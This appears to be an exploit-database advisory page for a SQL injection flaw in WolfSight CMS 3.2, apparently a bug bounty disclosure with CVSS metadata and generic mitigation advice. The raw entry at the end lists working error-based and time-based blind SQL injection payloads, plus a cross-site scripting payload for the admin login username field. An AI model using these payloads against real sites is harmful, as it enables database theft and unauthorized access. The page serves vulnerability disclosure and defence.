WolfSight CMS 3.2 - SQL Injection

vendor:

WolfSight CMS

by:

Berk Dusunur & Zehra Karabiber

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: WolfSight CMS

Affected Version From: v3.2

Affected Version To: v3.2

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Parrot OS, WinApp Server

2018

WolfSight CMS 3.2 – SQL Injection

The WolfSight CMS 3.2 is vulnerable to SQL Injection. An attacker can exploit this vulnerability to execute arbitrary SQL commands and gain unauthorized access to the database.

Mitigation:

To mitigate this vulnerability, it is recommended to apply the latest patches and updates provided by the vendor. Additionally, input validation and parameterized queries should be implemented to prevent SQL Injection attacks.

Source

Exploit-DB raw data:

# Exploit Title: WolfSight CMS 3.2 - SQL Injection
# Google Dork: N/A
# Date: 2018-07-10
# Exploit Author: Berk Dusunur & Zehra Karabiber
# Vendor Homepage: http://www.wolfsight.com
# Software Link: http://www.wolfsight.com
# Version: v3.2
# Tested on: Parrot OS / WinApp Server
# CVE : N/A

# PoC Sql Injection
# Parameter: #1* (URI)
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
# Payload: 

http://www.ip/page1-%bf%bf"-page1/' AND (SELECT 7988 FROM(SELECT COUNT(*),CONCAT(0x717a766a71,(SELECT(ELT(7988=7988,1))),0x71766b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'WpDn'='WpDn

# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 OR time-based blind
# Payload: 

http://www.ip/page1-%bf%bf"-page1/'OR SLEEP(5) AND 'kLLx'='kLLx

# PoC Cross-Site Scripting
# http://ip/admin/login.php
# Username

<IMG SRC=”javascript:alert(‘EZK’);”>

# This vulnerability was identified during bug bounty